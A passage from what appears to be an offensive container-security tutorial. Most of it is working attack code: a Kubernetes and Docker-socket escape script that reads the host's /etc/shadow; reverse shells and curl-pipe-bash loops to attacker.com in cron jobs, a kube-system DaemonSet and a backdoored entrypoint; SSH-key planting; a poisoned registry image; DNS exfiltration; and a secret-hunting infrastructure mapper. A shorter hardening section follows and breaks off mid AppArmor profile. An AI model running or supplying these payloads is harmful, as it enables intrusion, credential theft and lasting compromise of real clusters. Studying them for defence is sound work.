      mountPath: /var/run/secrets/kubernetes.io/serviceaccount
    - name: tmp
      mountPath: /tmp
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
  - name: service-account
    projected:
      sources:
      - serviceAccountToken:
          path: token
          expirationSeconds: 7200
  - name: tmp
    emptyDir: {}
---
# Included script to execute inside the pod
apiVersion: v1
kind: ConfigMap
metadata:
  name: escape-chain-script
data:
  escape.sh: |
    #!/bin/bash
    
    echo "[+] Starting multi-stage Kubernetes escape chain"
    
    # Stage 1: Check service account permissions
    TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
    
    echo "[+] Using service account token in namespace: $NAMESPACE"
    
    # Check permissions
    PERMISSIONS=$(curl -s -k -H "Authorization: Bearer $TOKEN" \
      https://kubernetes.default.svc/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
      -X POST -H "Content-Type: application/json" \
      -d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'$NAMESPACE'"}}')
    
    # Extract capabilities
    echo "[+] Checking for pod creation permission"
    if echo $PERMISSIONS | grep -q '"pods"'; then
      if echo $PERMISSIONS | grep -q '"create"'; then
        echo "[+] We have permission to create pods!"
        CAN_CREATE_PODS=true
      fi
    fi
    
    # Stage 2: Docker socket exploitation (if available)
    if [ -S /var/run/docker.sock ]; then
      echo "[+] Docker socket found, using it for escape"
      
      # Create a privileged container with host mount
      echo "[+] Creating privileged container"
      CONTAINER_ID=$(curl -s -X POST \
        --unix-socket /var/run/docker.sock \
        -H "Content-Type: application/json" \
        -d '{"Image":"ubuntu:20.04","Cmd":["/bin/sleep","9999"],"Binds":["/:/host"],"Privileged":true}' \
        http://localhost/containers/create | jq -r .Id)
      
      echo "[+] Starting container: $CONTAINER_ID"
      curl -s -X POST --unix-socket /var/run/docker.sock \
        http://localhost/containers/$CONTAINER_ID/start
      
      # Extract host /etc/shadow to prove escape
      echo "[+] Reading host /etc/shadow through container"
      EXEC_ID=$(curl -s -X POST --unix-socket /var/run/docker.sock \
        -H "Content-Type: application/json" \
        -d '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Cmd":["cat","/host/etc/shadow"]}' \
        http://localhost/containers/$CONTAINER_ID/exec | jq -r .Id)
      
      curl -s -X POST --unix-socket /var/run/docker.sock \
        -H "Content-Type: application/json" \
        -d '{"Detach":false,"Tty":false}' \
        http://localhost/exec/$EXEC_ID/start
      
      echo "[+] Docker socket escape successful"
      exit 0
    fi
    
    # Stage 3: Kubernetes pod creation (if we have permission)
    if [ "$CAN_CREATE_PODS" = true ]; then
      echo "[+] Attempting to create a privileged pod"
      
      # Create a privileged pod manifest
      cat > /tmp/privpod.json << EOF
      {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {
          "name": "privesc-pod",
          "namespace": "$NAMESPACE"
        },
        "spec": {
          "hostPID": true,
          "hostIPC": true,
          "hostNetwork": true,
          "containers": [
            {
              "name": "privesc",
              "image": "ubuntu:20.04",
              "command": ["sleep", "infinity"],
              "securityContext": {
                "privileged": true
              },
              "volumeMounts": [
                {
                  "mountPath": "/host",
                  "name": "hostfs"
                }
              ]
            }
          ],
          "volumes": [
            {
              "name": "hostfs",
              "hostPath": {
                "path": "/"
              }
            }
          ]
        }
      }
EOF
      
      # Create the pod
      curl -s -k -X POST -H "Authorization: Bearer $TOKEN" \
        -H "Content-Type: application/json" \
        --data-binary @/tmp/privpod.json \
        https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods
      
      echo "[+] Waiting for pod to be ready..."
      sleep 10
      
      # Exec into the pod to prove escape
      POD_READY=$(curl -s -k -H "Authorization: Bearer $TOKEN" \
        https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods/privesc-pod | \
        grep -o '"ready":true')
      
      if [ ! -z "$POD_READY" ]; then
        echo "[+] Pod is ready, creating exec session"
        
        # Create exec operation to read /etc/shadow
        EXEC_URL=$(curl -s -k -X POST -H "Authorization: Bearer $TOKEN" \
          -H "Content-Type: application/json" \
          -d '{"command":["cat", "/host/etc/shadow"],"stdin":false,"stdout":true,"stderr":true,"tty":false}' \
          https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods/privesc-pod/exec)
        
        echo "[+] Kubernetes pod escape successful"
        echo "[+] To access the pod: kubectl -n $NAMESPACE exec -it privesc-pod -- bash"
        echo "[+] Then explore the host filesystem at /host"
        exit 0
      else
        echo "[-] Pod not ready, escape may have failed"
      fi
    fi
    
    # Stage 4: hostPID exploitation (if available)
    if mount | grep -q "proc on /proc"; then
      echo "[+] We have hostPID, checking for processes"
      
      # Look for interesting processes
      echo "[+] Host processes accessible via /proc:"
      ps aux
      
      # Try to access host files through /proc
      HOST_PID1_ROOT="/proc/1/root"
      if [ -d "$HOST_PID1_ROOT" ]; then
        echo "[+] Attempting to access host files through $HOST_PID1_ROOT"
        ls -la $HOST_PID1_ROOT 2>/dev/null
        cat $HOST_PID1_ROOT/etc/shadow 2>/dev/null
        
        if [ $? -eq 0 ]; then
          echo "[+] hostPID escape successful"
          exit 0
        fi
      fi
    fi
    
    echo "[-] All escape methods failed"
    exit 1

Post-Escape Techniques

Once you've escaped a container, your work is just beginning. Let's explore how to maintain access, move laterally, and extract valuable information from the host environment.

Host Reconnaissance After Escape

After escaping a container, I immediately gather information about the host environment:

# Basic host information
hostname
uname -a
cat /etc/os-release
ip addr
ps aux

# Host users and services
cat /etc/passwd
ls -la /home/
find /home -name "*.ssh" -type d 2>/dev/null
systemctl list-units --type=service

# Container infrastructure
docker ps -a  # If Docker is used
docker images
kubectl get pods -A  # If Kubernetes is used
kubectl get nodes

Persistence Mechanisms

1. SSH Key Planting

One of the most reliable persistence methods is adding SSH keys:

# Find existing SSH directories
find / -name ".ssh" -type d 2>/dev/null

# Generate a new SSH key
ssh-keygen -t ed25519 -f /tmp/backdoor -N ""

# Add to authorized keys files
cat /tmp/backdoor.pub >> /root/.ssh/authorized_keys

# On developer machines, also add to user accounts
for user in $(ls /home/); do
  if [ -d "/home/$user/.ssh" ]; then
    cat /tmp/backdoor.pub >> /home/$user/.ssh/authorized_keys
    echo "Added key to /home/$user/.ssh/authorized_keys"
  fi
done

2. Cron Jobs

Creating cron jobs for persistence:

# Create reverse shell script
cat > /usr/local/bin/system_check.sh << 'EOF'
#!/bin/bash
# System monitoring tool

while true; do
  /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' &
  sleep 3600
done
EOF
chmod +x /usr/local/bin/system_check.sh

# Add to crontab
echo "*/10 * * * * root /usr/local/bin/system_check.sh >/dev/null 2>&1" > /etc/cron.d/system_check
chmod 644 /etc/cron.d/system_check

3. Compromising the Container Runtime

By modifying Docker or container runtime configurations, you can ensure persistence:

# Modify Docker daemon configuration to listen on TCP
cat > /etc/docker/daemon.json << 'EOF'
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
EOF

# Restart Docker to apply changes
systemctl restart docker

# Create a backdoored container image
cat > Dockerfile << 'EOF'
FROM ubuntu:20.04
RUN apt-get update && apt-get install -y openssh-server
RUN mkdir /run/sshd
RUN echo 'root:password' | chpasswd
RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
EXPOSE 22
CMD ["/usr/sbin/sshd", "-D"]
EOF

# Build and push to a registry
docker build -t legit-base-image:latest .
docker tag legit-base-image:latest registry.example.com/base-images/ubuntu:latest
docker push registry.example.com/base-images/ubuntu:latest

4. Kubernetes-Specific Persistence

In Kubernetes environments, we can achieve persistence through various resources:

# Create a privileged DaemonSet for persistence across all nodes
cat > persistence-ds.yaml << 'EOF'
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: security-agent
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: security-agent
  template:
    metadata:
      labels:
        app: security-agent
    spec:
      hostPID: true
      hostIPC: true
      hostNetwork: true
      containers:
      - name: agent
        image: ubuntu:20.04
        command: ["/bin/bash", "-c", "while true; do sleep 30; curl -s http://attacker.com/payload.sh | bash; done"]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
EOF

# Apply the DaemonSet
kubectl apply -f persistence-ds.yaml

Lateral Movement Across Containers

After escaping a container, I often need to access other containers:

# Using docker command
docker exec -it <container_id> bash

# If Docker command not available but socket is
curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Cmd":["bash"],"DetachKeys":"ctrl-p,ctrl-q"}' \
  http://localhost/containers/<container_id>/exec

Network Pivoting Between Containers

# Scan container network
for ip in $(seq 1 254); do
  ping -c 1 -W 1 172.17.0.$ip | grep "64 bytes" &
done

# Forward traffic between container networks (requires privileged container)
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 8080 -j DNAT --to-destination 10.0.0.2:80
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

Data Exfiltration Techniques

After escaping, I focus on extracting valuable data:

# Find interesting files
find /host -type f -name "*.key" -o -name "*.pem" -o -name "id_rsa" -o -name "*.conf" 2>/dev/null

# Look for secrets in configuration files
grep -r "password\|secret\|key\|token" /host/etc/ 2>/dev/null
grep -r "password\|secret\|key\|token" /host/opt/ 2>/dev/null
grep -r "password\|secret\|key\|token" /host/var/lib/docker/ 2>/dev/null

# Extract environment variables from running containers
for cid in $(docker ps -q); do
  echo "Container: $cid"
  docker inspect --format '{{range .Config.Env}}{{println .}}{{end}}' $cid
done

# Exfiltrate data via DNS (stealthy)
cat /host/etc/shadow | xxd -p | tr -d '\n' | fold -w 30 | while read exfil; do
  host "$exfil.shadow.exfil.example.com"
done

Infrastructure Mapping Script

After establishing access, I run this script to map the entire container infrastructure:

#!/usr/bin/env python3
# container_infrastructure_mapper.py

import os
import json
import subprocess
import datetime
import socket
import ipaddress
import re

class InfrastructureMapper:
    def __init__(self):
        self.output_file = f"infra_map_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
        self.infrastructure = {
            "timestamp": datetime.datetime.now().isoformat(),
            "hostname": socket.gethostname(),
            "ip_addresses": self.get_ip_addresses(),
            "container_runtime": self.detect_container_runtime(),
            "orchestration": self.detect_orchestration(),
            "containers": [],
            "images": [],
            "volumes": [],
            "networks": [],
            "hosts": [],
            "services": [],
            "sensitive_files": []
        }
    
    def get_ip_addresses(self):
        """Get all IP addresses of the host."""
        ip_output = subprocess.getoutput("ip -j addr show")
        try:
            ip_json = json.loads(ip_output)
            ip_addresses = []
            
            for interface in ip_json:
                interface_name = interface.get("ifname", "unknown")
                for addr_info in interface.get("addr_info", []):
                    ip_addresses.append({
                        "interface": interface_name,
                        "address": addr_info.get("local", "unknown"),
                        "family": "ipv4" if addr_info.get("family", "") == "inet" else "ipv6"
                    })
            
            return ip_addresses
        except:
            # Fallback if ip command doesn't support JSON output
            ip_addresses = []
            ip_output = subprocess.getoutput("hostname -I")
            for ip in ip_output.split():
                ip_addresses.append({
                    "interface": "unknown",
                    "address": ip,
                    "family": "ipv4" if "." in ip else "ipv6"
                })
            return ip_addresses
    
    def detect_container_runtime(self):
        """Detect which container runtime is in use."""
        runtime_info = {
            "name": "unknown",
            "version": "unknown",
            "socket_path": None,
            "config_paths": []
        }
        
        # Check for Docker
        docker_version = subprocess.getoutput("docker version --format '{{.Server.Version}}'")
        if "not found" not in docker_version.lower() and "error" not in docker_version.lower():
            runtime_info["name"] = "docker"
            runtime_info["version"] = docker_version
            
            socket_paths = ["/var/run/docker.sock", "/run/docker.sock"]
            for path in socket_paths:
                if os.path.exists(path):
                    runtime_info["socket_path"] = path
                    break
            
            config_paths = ["/etc/docker/daemon.json", "/etc/systemd/system/docker.service.d/"]
            for path in config_paths:
                if os.path.exists(path):
                    runtime_info["config_paths"].append(path)
        
        # Check for containerd
        containerd_version = subprocess.getoutput("containerd --version")
        if "containerd" in containerd_version.lower():
            runtime_info["name"] = "containerd"
            runtime_info["version"] = containerd_version
            
            socket_paths = ["/run/containerd/containerd.sock"]
            for path in socket_paths:
                if os.path.exists(path):
                    runtime_info["socket_path"] = path
                    break
            
            config_paths = ["/etc/containerd/config.toml"]
            for path in config_paths:
                if os.path.exists(path):
                    runtime_info["config_paths"].append(path)
        
        # Check for CRI-O
        crio_version = subprocess.getoutput("crictl --version")
        if "cri-o" in crio_version.lower():
            runtime_info["name"] = "cri-o"
            runtime_info["version"] = crio_version
            
            socket_paths = ["/var/run/crio/crio.sock"]
            for path in socket_paths:
                if os.path.exists(path):
                    runtime_info["socket_path"] = path
                    break
            
            config_paths = ["/etc/crio/crio.conf"]
            for path in config_paths:
                if os.path.exists(path):
                    runtime_info["config_paths"].append(path)
        
        return runtime_info
    
    def detect_orchestration(self):
        """Detect container orchestration platform."""
        orchestration_info = {
            "name": "unknown",
            "version": "unknown",
            "nodes": [],
            "config_paths": []
        }
        
        # Check for Kubernetes
        kubectl_version = subprocess.getoutput("kubectl version --short 2>/dev/null")
        if "server version" in kubectl_version.lower():
            orchestration_info["name"] = "kubernetes"
            server_version_match = re.search(r"Server Version: ([v\d\.]+)", kubectl_version)
            if server_version_match:
                orchestration_info["version"] = server_version_match.group(1)
            
            # Get nodes
            nodes_output = subprocess.getoutput("kubectl get nodes -o json 2>/dev/null")
            try:
                nodes_json = json.loads(nodes_output)
                for node in nodes_json.get("items", []):
                    node_info = {
                        "name": node.get("metadata", {}).get("name", "unknown"),
                        "roles": [],
                        "version": node.get("status", {}).get("nodeInfo", {}).get("kubeletVersion", "unknown"),
                        "internal_ip": "unknown"
                    }
                    
                    # Get node roles
                    for label in node.get("metadata", {}).get("labels", {}):
                        if "node-role.kubernetes.io" in label:
                            role = label.split("/")[1]
                            node_info["roles"].append(role)
                    
                    # Get internal IP
                    for address in node.get("status", {}).get("addresses", []):
                        if address.get("type") == "InternalIP":
                            node_info["internal_ip"] = address.get("address")
                    
                    orchestration_info["nodes"].append(node_info)
            except:
                pass
            
            config_paths = ["/etc/kubernetes/", "/var/lib/kubelet/config.yaml"]
            for path in config_paths:
                if os.path.exists(path):
                    orchestration_info["config_paths"].append(path)
        
        # Check for Docker Swarm
        swarm_info = subprocess.getoutput("docker info | grep -i swarm")
        if "swarm: active" in swarm_info.lower():
            orchestration_info["name"] = "docker_swarm"
            
            # Get nodes
            nodes_output = subprocess.getoutput("docker node ls --format '{{.Hostname}} {{.Status}} {{.ManagerStatus}}'")
            for line in nodes_output.splitlines():
                if not line.strip():
                    continue
                parts = line.split()
                if len(parts) >= 2:
                    hostname = parts[0]
                    status = parts[1]
                    manager_status = "worker"
                    if len(parts) > 2 and parts[2]:
                        manager_status = "manager"
                    
                    orchestration_info["nodes"].append({
                        "name": hostname,
                        "roles": [manager_status],
                        "status": status,
                        "internal_ip": "unknown"
                    })
        
        return orchestration_info
    
    def map_containers(self):
        """Map all running containers."""
        containers = []
        
        # Try using Docker
        if self.infrastructure["container_runtime"]["name"] == "docker":
            containers_output = subprocess.getoutput("docker ps -a --format '{{json .}}'")
            for line in containers_output.splitlines():
                if not line.strip():
                    continue
                
                try:
                    container_data = json.loads(line)
                    container_id = container_data.get("ID", "unknown")
                    
                    # Get detailed info
                    inspect_output = subprocess.getoutput(f"docker inspect {container_id}")
                    try:
                        inspect_data = json.loads(inspect_output)
                        if inspect_data and isinstance(inspect_data, list):
                            inspect_data = inspect_data[0]
                            
                            container_info = {
                                "id": container_id,
                                "name": container_data.get("Names", "unknown"),
                                "image": container_data.get("Image", "unknown"),
                                "created": inspect_data.get("Created", "unknown"),
                                "status": container_data.get("Status", "unknown"),
                                "ports": container_data.get("Ports", ""),
                                "command": container_data.get("Command", ""),
                                "privileged": inspect_data.get("HostConfig", {}).get("Privileged", False),
                                "network_mode": inspect_data.get("HostConfig", {}).get("NetworkMode", "unknown"),
                                "mounts": [],
                                "environment": [],
                                "capabilities": {
                                    "added": inspect_data.get("HostConfig", {}).get("CapAdd", []),
                                    "dropped": inspect_data.get("HostConfig", {}).get("CapDrop", [])
                                },
                                "networks": [],
                                "pid_mode": inspect_data.get("HostConfig", {}).get("PidMode", ""),
                                "ipc_mode": inspect_data.get("HostConfig", {}).get("IpcMode", "")
                            }
                            
                            # Extract mounts
                            for mount in inspect_data.get("Mounts", []):
                                container_info["mounts"].append({
                                    "source": mount.get("Source", "unknown"),
                                    "destination": mount.get("Destination", "unknown"),
                                    "mode": mount.get("Mode", "unknown"),
                                    "rw": mount.get("RW", False),
                                    "type": mount.get("Type", "unknown")
                                })
                            
                            # Extract environment variables
                            for env in inspect_data.get("Config", {}).get("Env", []):
                                container_info["environment"].append(env)
                            
                            # Extract networks
                            for network_name, network_config in inspect_data.get("NetworkSettings", {}).get("Networks", {}).items():
                                container_info["networks"].append({
                                    "name": network_name,
                                    "ip_address": network_config.get("IPAddress", "unknown"),
                                    "gateway": network_config.get("Gateway", "unknown"),
                                    "mac_address": network_config.get("MacAddress", "unknown")
                                })
                            
                            containers.append(container_info)
                    except:
                        # If inspect fails, add basic info
                        containers.append({
                            "id": container_id,
                            "name": container_data.get("Names", "unknown"),
                            "image": container_data.get("Image", "unknown"),
                            "status": container_data.get("Status", "unknown")
                        })
                except:
                    continue
        
        # Try using crictl for Kubernetes environments
        elif self.infrastructure["orchestration"]["name"] == "kubernetes":
            containers_output = subprocess.getoutput("crictl ps -a")
            container_lines = containers_output.splitlines()[1:]  # Skip header
            
            for line in container_lines:
                parts = line.split()
                if len(parts) >= 5:
                    container_id = parts[0]
                    image_id = parts[1]
                    created = parts[4]
                    status = parts[3]
                    pod_id = parts[5] if len(parts) > 5 else "unknown"
                    
                    # Get detailed info
                    inspect_output = subprocess.getoutput(f"crictl inspect {container_id}")
                    try:
                        inspect_data = json.loads(inspect_output)
                        
                        container_info = {
                            "id": container_id,
                            "image_id": image_id,
                            "created": created,
                            "status": status,
                            "pod_id": pod_id,
                            "name": inspect_data.get("status", {}).get("metadata", {}).get("name", "unknown"),
                            "mounts": [],
                            "environment": []
                        }
                        
                        # Extract mounts
                        for mount in inspect_data.get("status", {}).get("mounts", []):
                            container_info["mounts"].append({
                                "host_path": mount.get("host_path", "unknown"),
                                "container_path": mount.get("container_path", "unknown"),
                                "readonly": mount.get("readonly", False)
                            })
                        
                        # Extract environment variables
                        for env in inspect_data.get("info", {}).get("runtimeSpec", {}).get("process", {}).get("env", []):
                            container_info["environment"].append(env)
                        
                        containers.append(container_info)
                    except:
                        # If inspect fails, add basic info
                        containers.append({
                            "id": container_id,
                            "image_id": image_id,
                            "created": created,
                            "status": status,
                            "pod_id": pod_id
                        })
        
        self.infrastructure["containers"] = containers
    
    def map_images(self):
        """Map all container images."""
        images = []
        
        # Try using Docker
        if self.infrastructure["container_runtime"]["name"] == "docker":
            images_output = subprocess.getoutput("docker images --format '{{json .}}'")
            for line in images_output.splitlines():
                if not line.strip():
                    continue
                
                try:
                    image_data = json.loads(line)
                    image_info = {
                        "repository": image_data.get("Repository", "unknown"),
                        "tag": image_data.get("Tag", "unknown"),
                        "id": image_data.get("ID", "unknown"),
                        "created": image_data.get("CreatedAt", "unknown"),
                        "size": image_data.get("Size", "unknown")
                    }
                    images.append(image_info)
                except:
                    continue
        
        # Try using crictl for Kubernetes environments
        elif self.infrastructure["orchestration"]["name"] == "kubernetes":
            images_output = subprocess.getoutput("crictl images")
            image_lines = images_output.splitlines()[1:]  # Skip header
            
            for line in image_lines:
                parts = line.split()
                if len(parts) >= 5:
                    repository = parts[0]
                    tag = parts[1]
                    id = parts[2]
                    created = parts[3] + " " + parts[4]
                    size = parts[5]
                    
                    image_info = {
                        "repository": repository,
                        "tag": tag,
                        "id": id,
                        "created": created,
                        "size": size
                    }
                    images.append(image_info)
        
        self.infrastructure["images"] = images
    
    def map_networks(self):
        """Map all container networks."""
        networks = []
        
        # Try using Docker
        if self.infrastructure["container_runtime"]["name"] == "docker":
            networks_output = subprocess.getoutput("docker network ls --format '{{json .}}'")
            for line in networks_output.splitlines():
                if not line.strip():
                    continue
                
                try:
                    network_data = json.loads(line)
                    network_id = network_data.get("ID", "unknown")
                    
                    # Get detailed info
                    inspect_output = subprocess.getoutput(f"docker network inspect {network_id}")
                    try:
                        inspect_data = json.loads(inspect_output)
                        if inspect_data and isinstance(inspect_data, list):
                            inspect_data = inspect_data[0]
                            
                            network_info = {
                                "id": network_id,
                                "name": network_data.get("Name", "unknown"),
                                "driver": network_data.get("Driver", "unknown"),
                                "scope": network_data.get("Scope", "unknown"),
                                "subnet": "",
                                "gateway": "",
                                "containers": []
                            }
                            
                            # Extract subnet and gateway
                            if "IPAM" in inspect_data and "Config" in inspect_data["IPAM"]:
                                for config in inspect_data["IPAM"]["Config"]:
                                    if "Subnet" in config:
                                        network_info["subnet"] = config["Subnet"]
                                    if "Gateway" in config:
                                        network_info["gateway"] = config["Gateway"]
                            
                            # Extract connected containers
                            if "Containers" in inspect_data:
                                for container_id, container_data in inspect_data["Containers"].items():
                                    network_info["containers"].append({
                                        "id": container_id,
                                        "name": container_data.get("Name", "unknown"),
                                        "mac_address": container_data.get("MacAddress", "unknown"),
                                        "ipv4_address": container_data.get("IPv4Address", "unknown")
                                    })
                            
                            networks.append(network_info)
                    except:
                        # If inspect fails, add basic info
                        networks.append({
                            "id": network_id,
                            "name": network_data.get("Name", "unknown"),
                            "driver": network_data.get("Driver", "unknown"),
                            "scope": network_data.get("Scope", "unknown")
                        })
                except:
                    continue
        
        self.infrastructure["networks"] = networks
    
    def map_volumes(self):
        """Map all container volumes."""
        volumes = []
        
        # Try using Docker
        if self.infrastructure["container_runtime"]["name"] == "docker":
            volumes_output = subprocess.getoutput("docker volume ls --format '{{json .}}'")
            for line in volumes_output.splitlines():
                if not line.strip():
                    continue
                
                try:
                    volume_data = json.loads(line)
                    volume_name = volume_data.get("Name", "unknown")
                    
                    # Get detailed info
                    inspect_output = subprocess.getoutput(f"docker volume inspect {volume_name}")
                    try:
                        inspect_data = json.loads(inspect_output)
                        if inspect_data and isinstance(inspect_data, list):
                            inspect_data = inspect_data[0]
                            
                            volume_info = {
                                "name": volume_name,
                                "driver": volume_data.get("Driver", "unknown"),
                                "mountpoint": inspect_data.get("Mountpoint", "unknown"),
                                "created": inspect_data.get("CreatedAt", "unknown"),
                                "labels": inspect_data.get("Labels", {})
                            }
                            volumes.append(volume_info)
                    except:
                        # If inspect fails, add basic info
                        volumes.append({
                            "name": volume_name,
                            "driver": volume_data.get("Driver", "unknown")
                        })
                except:
                    continue
        
        self.infrastructure["volumes"] = volumes
    
    def scan_for_sensitive_files(self):
        """Scan for sensitive files on the host."""
        sensitive_files = []
        
        # List of paths to check
        paths_to_check = [
            "/etc/",
            "/root/",
            "/home/",
            "/var/lib/docker/",
            "/var/lib/kubelet/",
            "/var/lib/containerd/"
        ]
        
        # Patterns to look for
        patterns = [
            "*.key",
            "*.pem",
            "id_rsa",
            "*.password",
            "*.token",
            "credentials",
            "*.conf",
            "*.yaml",
            "*.json"
        ]
        
        # Build find command
        for path in paths_to_check:
            if not os.path.exists(path):
                continue
            
            pattern_args = []
            for pattern in patterns:
                pattern_args.append("-name")
                pattern_args.append(f'"{pattern}"')
            
            find_cmd = f"find {path} -type f \\( {' -o '.join(pattern_args)} \\) 2>/dev/null"
            files_output = subprocess.getoutput(find_cmd)
            
            for file_path in files_output.splitlines():
                if not file_path.strip() or not os.path.exists(file_path):
                    continue
                
                try:
                    stat_info = os.stat(file_path)
                    sensitive_files.append({
                        "path": file_path,
                        "size": stat_info.st_size,
                        "owner_uid": stat_info.st_uid,
                        "group_gid": stat_info.st_gid,
                        "permissions": oct(stat_info.st_mode)[-3:],
                        "last_modified": datetime.datetime.fromtimestamp(stat_info.st_mtime).isoformat()
                    })
                except:
                    continue
        
        self.infrastructure["sensitive_files"] = sensitive_files
    
    def map_host_services(self):
        """Map services running on the host."""
        services = []
        
        # Try using systemctl
        systemctl_output = subprocess.getoutput("systemctl list-units --type=service --all --no-pager")
        service_lines = systemctl_output.splitlines()
        
        # Skip header lines
        start_index = 0
        for i, line in enumerate(service_lines):
            if "UNIT" in line and "LOAD" in line:
                start_index = i + 1
                break
        
        # Parse service lines
        for line in service_lines[start_index:]:
            if "●" in line or "UNIT" in line or "LOAD" in line or line.strip() == "":
                continue
            
            parts = line.split()
            if len(parts) >= 3:
                service_name = parts[0]
                load_status = parts[1]
                active_status = parts[2]
                
                # Get detailed info
                service_info = {
                    "name": service_name,
                    "load_status": load_status,
                    "active_status": active_status,
                    "description": " ".join(parts[3:])
                }
                
                # Get additional details
                status_output = subprocess.getoutput(f"systemctl status {service_name} --no-pager")
                
                # Extract PID
                pid_match = re.search(r"Main PID: (\d+)", status_output)
                if pid_match:
                    service_info["pid"] = pid_match.group(1)
                
                # Extract binary path
                exec_match = re.search(r"ExecStart=(.*?)$", status_output, re.MULTILINE)
                if exec_match:
                    service_info["exec_start"] = exec_match.group(1)
                
                services.append(service_info)
        
        self.infrastructure["services"] = services
    
    def map_infrastructure(self):
        """Map the entire container infrastructure."""
        print("[+] Starting infrastructure mapping")
        
        print("[+] Mapping containers")
        self.map_containers()
        
        print("[+] Mapping images")
        self.map_images()
        
        print("[+] Mapping networks")
        self.map_networks()
        
        print("[+] Mapping volumes")
        self.map_volumes()
        
        print("[+] Scanning for sensitive files")
        self.scan_for_sensitive_files()
        
        print("[+] Mapping host services")
        self.map_host_services()
        
        # Save results
        with open(self.output_file, "w") as f:
            json.dump(self.infrastructure, f, indent=2)
        
        print(f"[+] Infrastructure mapping complete. Results saved to {self.output_file}")

# Main execution
if __name__ == "__main__":
    mapper = InfrastructureMapper()
    mapper.map_infrastructure()

Container Backdoors

These backdoor techniques are particularly effective in containerized environments:

# Reverse shell script for container persistence
cat > /usr/local/bin/container_monitor.sh << 'EOF'
#!/bin/bash
# Container monitoring utility

while true; do
  # Try to connect back every hour
  /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' &
  
  # If that fails, try alternative method
  curl -s http://attacker.com/shell.sh | bash &
  
  # Sleep and try again
  sleep 3600
done
EOF
chmod +x /usr/local/bin/container_monitor.sh

# Add to image entrypoint
cat > /usr/local/bin/custom_entrypoint.sh << 'EOF'
#!/bin/bash
# Launch original entrypoint
/usr/local/bin/container_monitor.sh &
exec "$@"
EOF
chmod +x /usr/local/bin/custom_entrypoint.sh

Hands-On Challenge #9: Post-Escape Lab

Practice post-exploitation techniques in a containerized environment:

# Start a Docker host with multiple containers
docker run -d --name redis redis:latest
docker run -d --name mysql -e MYSQL_ROOT_PASSWORD=password mysql:5.7
docker run -d --name webapp -p 8080:80 nginx:latest

# Create a "compromised" container to practice with
docker run -it --name attacker --privileged ubuntu:20.04 bash

# From the attacker container, escape to the host
# Then practice:
# 1. Mapping all containers and their configurations
# 2. Accessing other container data
# 3. Establishing persistence
# 4. Extracting sensitive information

Defending Against Container Escapes

Understanding container escape techniques puts us in a unique position to build effective defenses. Let's explore how to secure containerized environments against these attacks.

Security Best Practices

1. Container Configuration Hardening

# Run containers with the least privileges needed
docker run --security-opt=no-new-privileges \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp:rw,noexec \
  -v data-volume:/data:ro \
  nginx:latest

# Use user namespaces to remap root
# Add to /etc/docker/daemon.json:
{
  "userns-remap": "default"
}

# Limit resources to prevent DoS
docker run --memory=512m \
  --memory-swap=512m \
  --cpus=0.5 \
  --pids-limit=100 \
  nginx:latest

2. Never Run Privileged Containers

The single most important rule in container security:

# Instead of --privileged, add only required capabilities
docker run --cap-add=SYS_ADMIN \
  --cap-add=NET_ADMIN \
  ubuntu:20.04

# If you must mount devices, mount specific ones
docker run --device=/dev/fuse:/dev/fuse \
  ubuntu:20.04

3. Secure the Docker Socket

# Bind to Unix socket only (not TCP)
# Update /etc/docker/daemon.json
{
  "hosts": ["unix:///var/run/docker.sock"]
}

# Set proper permissions
sudo chmod 660 /var/run/docker.sock
sudo chown root:docker /var/run/docker.sock

# Never mount the socket into containers
# Instead of:
docker run -v /var/run/docker.sock:/var/run/docker.sock ...

# Use a Docker socket proxy with TLS and ACLs
docker run -d --name socket-proxy \
  -v /var/run/docker.sock:/var/run/docker.sock \
  -p 127.0.0.1:2375:2375 \
  tecnativa/docker-socket-proxy:latest

4. Use gVisor or Kata Containers for Enhanced Isolation

# Install gVisor (runsc)
curl -fsSL https://gvisor.dev/archive.key | sudo gpg --dearmor -o /usr/share/keyrings/gvisor-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/gvisor-archive-keyring.gpg] https://storage.googleapis.com/gvisor/releases release main" | sudo tee /etc/apt/sources.list.d/gvisor.list
sudo apt-get update && sudo apt-get install -y runsc

# Configure Docker to use gVisor
# Add to /etc/docker/daemon.json:
{
  "runtimes": {
    "runsc": {
      "path": "/usr/bin/runsc",
      "runtimeArgs": []
    }
  }
}

# Run container with gVisor
docker run --runtime=runsc nginx:latest

5. Implement and Enforce Security Policies

AppArmor profiles for Docker:

# Create an AppArmor profile
cat > /etc/apparmor.d/docker-nginx << 'EOF'
#include <tunables/global>

profile docker-nginx flags=(attach_disconnected, mediate_deleted) {
  #include <abstractions/base>
  #include <abstractions/nameservice>

  network inet tcp,
  network inet udp,
  
  deny mount,
  deny /proc/** rw,
  deny /sys/** rw,
  deny /root/** rw,
  
  /var/run/nginx.pid w,
  /usr/sbin/nginx ix,
  /etc/nginx/** r,
  /var/log/nginx/** w,
